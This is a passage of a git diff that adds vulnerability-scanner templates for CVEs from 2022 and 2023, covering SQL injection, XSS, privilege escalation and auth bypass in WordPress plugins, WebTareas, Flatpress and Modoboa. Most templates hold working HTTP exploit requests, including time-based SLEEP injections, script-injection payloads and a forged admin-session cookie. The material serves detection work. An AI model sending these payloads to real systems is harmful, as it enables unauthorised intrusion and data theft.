System v1.0 - SQL Injection + author: r3Y3r53 + severity: critical + description: | + SQL injection occurs when a web application doesn't properly validate or sanitize user input that is used in SQL queries. Attackers can exploit this by injecting malicious SQL code into the input fields of a web application, tricking the application into executing unintended database queries. + reference: + - https://www.exploit-db.com/exploits/51273 + - https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-40032 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-40032 + cwe-id: CWE-89 + metadata: + max-request: 1 + verified: true + tags: cve,cve2022,simple-task,stms,sqli + +http: + - raw: + - | + @timeout: 15s + POST /task/loginValidation.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + login=test'%20AND%20(SELECT%208979%20FROM%20(SELECT(SLEEP(7-(IF(ORD(MID((SELECT%20DISTINCT(IFNULL(CAST(schema_name%20AS%20NCHAR)%2c0x20))%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%200%2c1)%2c12%2c1))%3e48%2c0%2c1)))))jaXJ)--%20HgKq&password= + + matchers: + - type: dsl + dsl: + - 'duration>=7' + - 'status_code == 302' + - "contains(location, 'login.php')" + - 'contains(content_type, "text/html")' + condition: and diff --git a/http/cves/2022/CVE-2022-40047.yaml b/http/cves/2022/CVE-2022-40047.yaml new file mode 100644 index 0000000000..d7c0ddca73 --- /dev/null +++ b/http/cves/2022/CVE-2022-40047.yaml @@ -0,0 +1,54 @@ +id: CVE-2022-40047 + +info: + name: Flatpress < v1.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-40047 + - https://github.com/flatpressblog/flatpress/issues/153 + metadata: + max-request: 2 + verified: true + shodan-query: http.html:"flatpress" + tags: cve,cve2022,flatpress,authenticated,xss + +variables: + randstring: "{{to_lower(rand_base(16))}}" + +http: + - raw: + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}} + + ------WebKitFormBoundary{{randstring}} + Content-Disposition: form-data; name="user" + + {{username}} + ------WebKitFormBoundary{{randstring}} + Content-Disposition: form-data; name="pass" + + {{password}} + ------WebKitFormBoundary{{randstring}} + Content-Disposition: form-data; name="submit" + + Login + ------WebKitFormBoundary{{randstring}}-- + + - | + GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.domain%29%22autofocus%3d%22zr4da HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "flatpress")' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "onfocus=\"alert(document.domain)")' + condition: and diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml new file mode 100644 index 0000000000..6cfe0e8983 --- /dev/null +++ b/http/cves/2022/CVE-2022-4049.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-4049 + +info: + name: WP User <= 7.0 - Unauthenticated SQLi + author: theamanrawat + severity: critical + description: | + The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users. + reference: + - https://wpscan.com/vulnerability/9b0781e2-ad62-4308-bafc-d45b9a2472be + - https://wordpress.org/plugins/wp-user/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-4049 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-4049 + cwe-id: CWE-89 + metadata: + verified: "true" + publicwww-query: "/wp-content/plugins/wp-user/" + max-request: 2 + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth + +http: + - raw: + - | + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=wpuser_group_action&group_action=x&wpuser_update_setting={{nonce}}&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))khkM) + + attack: clusterbomb + payloads: + path: + - "/index.php/user/" + - "/user" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - duration>=6 + - status_code == 200 + - contains(header_2, "text/html") + - contains(body_2, 'Invalid Access') + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - '"wpuser_update_setting":"([0-9a-zA-Z]+)"' + internal: true diff --git a/http/cves/2022/CVE-2022-4059.yaml b/http/cves/2022/CVE-2022-4059.yaml new file mode 100644 index 0000000000..3411a252ff --- /dev/null +++ b/http/cves/2022/CVE-2022-4059.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-4059 + +info: + name: Cryptocurrency Widgets Pack < 2.0 - SQL Injection + author: r3Y3r53 + severity: critical + description: | + The plugin does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. + remediation: Fixed in version 2.0 + reference: + - https://wpscan.com/vulnerability/d94bb664-261a-4f3f-8cc3-a2db8230895d + - https://nvd.nist.gov/vuln/detail/CVE-2022-4059 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-4059 + cwe-id: CWE-89 + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/cryptocurrency-widgets-pack/" + tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli + +http: + - raw: + - | + @timeout: 20s + GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1 + Host: {{Hostname}} + + - | + GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration_1>=7' + - 'len(body_1) == 0' + - 'status_code_1 == 302' + - 'contains(body_2, "Cryptocurrency Widgets Pack")' + condition: and diff --git a/http/cves/2022/CVE-2022-4305.yaml b/http/cves/2022/CVE-2022-4305.yaml new file mode 100644 index 0000000000..d2e99cce53 --- /dev/null +++ b/http/cves/2022/CVE-2022-4305.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-4305 + +info: + name: Login as User or Customer < 3.3 - Privilege Escalation + author: r3Y3r53 + severity: critical + description: | + The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session. + remediation: Fixed in version 3.3 + reference: + - https://wpscan.com/vulnerability/286d972d-7bda-455c-a226-fd9ce5f925bd + - https://nvd.nist.gov/vuln/detail/CVE-2022-4305 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-4305 + cwe-id: CWE-269 + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/login-as-customer-or-user" + tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass + +http: + - raw: + - | + GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1 + Host: {{Hostname}} + Cookie: loginas_old_user_id=1 + + - | + GET /wp-admin/users.php HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - status_code_2 == 200 + - contains(header_2, "text/html") + - contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts') + condition: and diff --git a/http/cves/2022/CVE-2022-44290.yaml b/http/cves/2022/CVE-2022-44290.yaml new file mode 100644 index 0000000000..a204edf56f --- /dev/null +++ b/http/cves/2022/CVE-2022-44290.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-44290 + +info: + name: WebTareas 2.4p5 - SQL Injection + author: theamanrawat + severity: critical + description: | + webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in deleteapprovalstages.php. + reference: + - http://webtareas.com/ + - https://github.com/anhdq201/webtareas/issues/2 + - https://nvd.nist.gov/vuln/detail/CVE-2022-44290 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-44290 + cwe-id: CWE-89 + metadata: + max-request: 2 + verified: true + tags: cve,cve2022,sqli,webtareas,authenticated + +http: + - raw: + - | + POST /general/login.php?session=false HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525 + + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="action" + + login + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="loginForm" + + {{username}} + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="passwordForm" + + {{password}} + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="loginSubmit" + + Log In + -----------------------------3023071625140724693672385525-- + + - | + @timeout: 20s + GET /approvals/deleteapprovalstages.php?id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - duration>=6 + - status_code == 200 + - contains(header, "text/html") + - contains(body, 'Delete the following?') + condition: and diff --git a/http/cves/2022/CVE-2022-44291.yaml b/http/cves/2022/CVE-2022-44291.yaml new file mode 100644 index 0000000000..c3094948e8 --- /dev/null +++ b/http/cves/2022/CVE-2022-44291.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-44291 + +info: + name: WebTareas 2.4p5 - SQL Injection + author: theamanrawat + severity: critical + description: | + webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php. + reference: + - http://webtareas.com/ + - https://github.com/anhdq201/webtareas/issues/1 + - https://nvd.nist.gov/vuln/detail/CVE-2022-44291 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-44291 + cwe-id: CWE-89 + metadata: + verified: true + tags: cve,cve2022,sqli,webtareas,authenticated + +http: + - raw: + - | + POST /general/login.php?session=false HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525 + + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="action" + + login + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="loginForm" + + {{username}} + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="passwordForm" + + {{password}} + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="loginSubmit" + + Log In + -----------------------------3023071625140724693672385525-- + + - | + @timeout: 20s + GET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'duration_2>=6' + - 'len(body_2) == 0' + - 'status_code_2 == 302' + - 'contains(header_2, "text/html")' + - 'contains(body_1, "webTareasSID")' + condition: and diff --git a/http/cves/2022/CVE-2022-44957.yaml b/http/cves/2022/CVE-2022-44957.yaml new file mode 100644 index 0000000000..859b3bcbd4 --- /dev/null +++ b/http/cves/2022/CVE-2022-44957.yaml @@ -0,0 +1,166 @@ +id: CVE-2022-44957 + +info: + name: WebTareas 2.4p5 - Cross-Site Scripting + author: theamanrawat + severity: medium + description: | + webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /clients/listclients.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + reference: + - http://webtareas.com/ + - https://github.com/anhdq201/webtareas/issues/11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-44957 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44957 + cwe-id: CWE-79 + metadata: + max-request: 3 + verified: true + tags: cve,cve2022,xss,webtareas,authenticated + +http: + - raw: + - | + POST /general/login.php?session=false HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525 + + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="action" + + login + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="loginForm" + + {{username}} + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="passwordForm" + + {{password}} + -----------------------------3023071625140724693672385525 + Content-Disposition: form-data; name="loginSubmit" + + Log In + -----------------------------3023071625140724693672385525-- + + - | + GET /clients/editclient.php? HTTP/1.1 + Host: {{Hostname}} + + - | + POST /clients/editclient.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------34025600472463336623659912061 + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="csrfToken" + + {{csrf}} + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="action" + + add + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="cown" + + 1 + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="cn" + + {{randstr}}
+ -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="add" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="zip" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="ct" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="cou" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="wp" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="fa" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="url" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="email" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="curr" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="wc" + + 1 + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="pym" + + 1 + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="pyt" + + 7 + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="c" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="ssc" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="file1"; filename="" + Content-Type: application/octet-stream + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="attnam1" + + + -----------------------------34025600472463336623659912061 + Content-Disposition: form-data; name="atttmp1" + + + -----------------------------34025600472463336623659912061-- + + host-redirects: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - '
' + - 'clients/listclients.php?' + condition: and + + - type: word + part: header_3 + words: + - text/html + + extractors: + - type: regex + name: csrf + group: 1 + regex: + - 'name="csrfToken" value="([0-9a-zA-Z]+)"' + internal: true diff --git a/http/cves/2022/CVE-2022-45365.yaml b/http/cves/2022/CVE-2022-45365.yaml new file mode 100644 index 0000000000..b841b5e34b --- /dev/null +++ b/http/cves/2022/CVE-2022-45365.yaml @@ -0,0 +1,51 @@ +id: CVE-2022-45365 + +info: + name: Stock Ticker <= 3.23.2 - Cross-Site-Scripting + author: theamanrawat + severity: medium + description: | + The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_symbol_search_test function in versions up to, and including, 3.23.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stock-ticker/stock-ticker-3232-reflected-cross-site-scripting-in-ajax-stockticker-symbol-search-test + - https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-2-reflected-cross-site-scripting-xss-vulnerability + - https://wordpress.org/plugins/stock-ticker/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-45365 + remediation: Fixed in version 3.23.3 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-45365 + cwe-id: CWE-79 + metadata: + verified: "true" + publicwww-query: "/wp-content/plugins/stock-ticker/" + max-request: 1 + tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=stockticker_symbol_search_test&symbol=test&endpoint=%3Cimg+src%3Dx+onerror%3D%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%28document.domain%29%3E + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Stock Ticker Fatal" + - "")' + condition: and diff --git a/http/cves/2023/CVE-2023-0600.yaml b/http/cves/2023/CVE-2023-0600.yaml new file mode 100644 index 0000000000..17249a99f1 --- /dev/null +++ b/http/cves/2023/CVE-2023-0600.yaml @@ -0,0 +1,40 @@ +id: CVE-2023-0600 + +info: + name: WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection + author: r3Y3r53 + severity: high + description: | + The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks. + remediation: Fixed in version 6.9 + reference: + - https://wpscan.com/vulnerability/8f46df4d-cb80-4d66-846f-85faf2ea0ec4 + - https://nvd.nist.gov/vuln/detail/CVE-2023-0600 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-0600 + cwe-id: CWE-89 + metadata: + max-request: 1 + verified: true + public-www: "/wp-content/plugins/wp-stats-manager/" + tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli + +variables: + str: '{{rand_int(100000, 999999)}}' + +http: + - raw: + - | + @timeout: 30s + GET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(body, "sleep(10)")' + condition: and diff --git a/http/cves/2023/CVE-2023-0602.yaml b/http/cves/2023/CVE-2023-0602.yaml new file mode 100644 index 0000000000..0d552523db --- /dev/null +++ b/http/cves/2023/CVE-2023-0602.yaml @@ -0,0 +1,37 @@ +id: CVE-2023-0602 +info: + name: Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen. + reference: + - https://wpscan.com/vulnerability/c357f93d-4f21-4cd9-9378-d97756c75255 + - https://nvd.nist.gov/vuln/detail/CVE-2023-0602 + - https://wordpress.org/plugins/twittee-text-tweet/ + metadata: + verified: true + max-request: 2 + tags: cve,cve2023,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ez2u4g HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, "") && contains(body_2, "twittee")' + condition: and diff --git a/http/cves/2023/CVE-2023-0777.yaml b/http/cves/2023/CVE-2023-0777.yaml new file mode 100644 index 0000000000..56977d2b0a --- /dev/null +++ b/http/cves/2023/CVE-2023-0777.yaml @@ -0,0 +1,66 @@ +id: CVE-2023-0777 + +info: + name: modoboa 2.0.4 - Admin TakeOver + author: r3Y3r53 + severity: critical + description: | + Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4. + remediation: update to version 2.0.4 + reference: + - https://huntr.dev/bounties/a17e7a9f-0fee-4130-a522-5a0466fc17c7/ + - http://packetstormsecurity.com/files/171744/modoboa-2.0.4-Admin-Takeover.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-0777 + cwe-id: CWE-305 + cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:* + metadata: + verified: true + shodan-query: html:"Modoboa" + fofa-query: body="Modoboa" + tags: modoboa,default-login + +http: + - raw: + - | + GET /accounts/login/ HTTP/1.1 + Host: {{Hostname}} + + - | + POST /accounts/login/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + csrfmiddlewaretoken={{csrftoken}}&username={{username}}&password={{password}}&next=%2F + + - | + GET /dashboard/ HTTP/1.1 + Host: {{Hostname}} + + payloads: + username: + - admin + password: + - password + attack: pitchfork + + cookie-reuse: true + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "Dashboard") && contains(body_3, "Hello admin")' + condition: and + + extractors: + - type: regex + part: header + name: csrftoken + internal: true + group: 1 + regex: + - csrftoken=([A-Za-z0-9]+) diff --git a/http/cves/2023/CVE-2023-0900.yaml b/http/cves/2023/CVE-2023-0900.yaml new file mode 100644 index 0000000000..a58ed6e23b --- /dev/null +++ b/http/cves/2023/CVE-2023-0900.yaml @@ -0,0 +1,63 @@ +id: CVE-2023-0900 + +info: + name: AP Pricing Tables Lite <= 1.1.6 - SQL Injection + author: r3Y3r53 + severity: high + description: | + The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins. + reference: + - https://wpscan.com/vulnerability/f601e637-a486-4f3a-9077-4f294ace7ea1 + - https://github.com/WPPlugins/ap-pricing-tables-lite + - https://nvd.nist.gov/vuln/detail/CVE-2023-0900 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-0900 + cwe-id: CWE-89 + metadata: + max-request: 3 + verified: true + publicwww-query: "wp-content/plugins/ap-pricing-tables-lite" + tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=ap-pricing-tables-lite&message=1 HTTP/1.1 + Host: {{Hostname}} + + - | + @timeout: 20s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded + + action=backend_ajax&_action=copy_table&table_id=1+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce={{nonce}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'duration_3>=5' + - 'status_code_3 == 200' + - 'contains(body_3, "Security check")' + - 'contains(body_2, "ap-pricing-tables-lite")' + condition: and + + extractors: + - type: regex + name: nonce + part: body + group: 1 + regex: + - '_wpnonce=([0-9a-z]+)">Log Out' + internal: true diff --git a/http/cves/2023/CVE-2023-0947.yaml b/http/cves/2023/CVE-2023-0947.yaml new file mode 100644 index 0000000000..803eb839f2 --- /dev/null +++ b/http/cves/2023/CVE-2023-0947.yaml @@ -0,0 +1,34 @@ +id: CVE-2023-0947 + +info: + name: Flatpress < 1.3 - Path Traversal + author: r3Y3r53 + severity: critical + description: | + Path Traversal in GitHub repository flatpressblog/flatpress prior to 1.3. + reference: + - https://huntr.dev/bounties/7379d702-72ff-4a5d-bc68-007290015496/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-0947 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-0947 + cwe-id: CWE-22 + metadata: + verified: true + shodan-query: http.favicon.hash:-1189292869 + tags: cve,cve2023,lfi,flatpress,listing + +http: + - method: GET + path: + - "{{BaseURL}}/fp-content/" + - "{{BaseURL}}/flatpress/fp-content/" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "Index of /fp-content")' + condition: and diff --git a/http/cves/2023/CVE-2023-1263.yaml b/http/cves/2023/CVE-2023-1263.yaml new file mode 100644 index 0000000000..2b5af9b7ec --- /dev/null +++ b/http/cves/2023/CVE-2023-1263.yaml @@ -0,0 +1,52 @@ +id: CVE-2023-1263 + +info: + name: Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access + author: r3Y3r53 + severity: medium + description: | + The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them. + reference: + - https://wpscan.com/vulnerability/2e07ffd9-8e82-4078-96aa-162ef78c417b + - https://nvd.nist.gov/vuln/detail/CVE-2023-1263 + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cmp-coming-soon-maintenance/cmp-coming-soon-maintenance-plugin-by-niteothemes-416-information-exposure + - https://wordpress.org/plugins/cmp-coming-soon-maintenance/ + remediation: Fixed in version 4.1.7 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-1263 + cwe-id: CWE-862 + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/cmp-coming-soon-maintenance/" + tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=cmp_get_post_detail&id=1 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"img":' + - '"date":' + - '"title":' + condition: and + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-1408.yaml b/http/cves/2023/CVE-2023-1408.yaml new file mode 100644 index 0000000000..dd0ee485e0 --- /dev/null +++ b/http/cves/2023/CVE-2023-1408.yaml @@ -0,0 +1,46 @@ +id: CVE-2023-1408 + +info: + name: Video List Manager <= 1.7 - SQL Injection + author: r3Y3r53 + severity: critical + description: | + The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin. + reference: + - https://wpscan.com/vulnerability/baf7ef4d-b2ba-48e0-9c17-74fa27e0c15b + - https://wordpress.org/plugins/video-list-manager/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-1408 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-1408 + cwe-id: CWE-89 + metadata: + verified: true + publicwww-query: "/wp-content/plugins/video-list-manager/" + max-request: 1 + tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + @timeout: 15s + GET /wp-admin/admin.php?page=tnt_video_edit_page&videoID=SLEEP(7) HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'duration_2>=7' + - 'status_code_2 == 200' + - 'contains_all(body_2, "Edit Video","Youtube")' + condition: and diff --git a/http/cves/2023/CVE-2023-1780.yaml b/http/cves/2023/CVE-2023-1780.yaml new file mode 100644 index 0000000000..23d41c6a5b --- /dev/null +++ b/http/cves/2023/CVE-2023-1780.yaml @@ -0,0 +1,45 @@ +id: CVE-2023-1780 + +info: + name: Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + remediation: Fixed in version 4.5.3 + reference: + - https://wpscan.com/vulnerability/8176308f-f210-4109-9c88-9372415dbed3 + - https://nvd.nist.gov/vuln/detail/CVE-2023-1780 + classification: + cve-id: CVE-2023-1780 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + max-request: 2 + verified: true + publicwww-query: "/wp-content/plugins/companion-sitemap-generator/" + tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/tools.php?page=csg-sitemap&tabbed=%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' 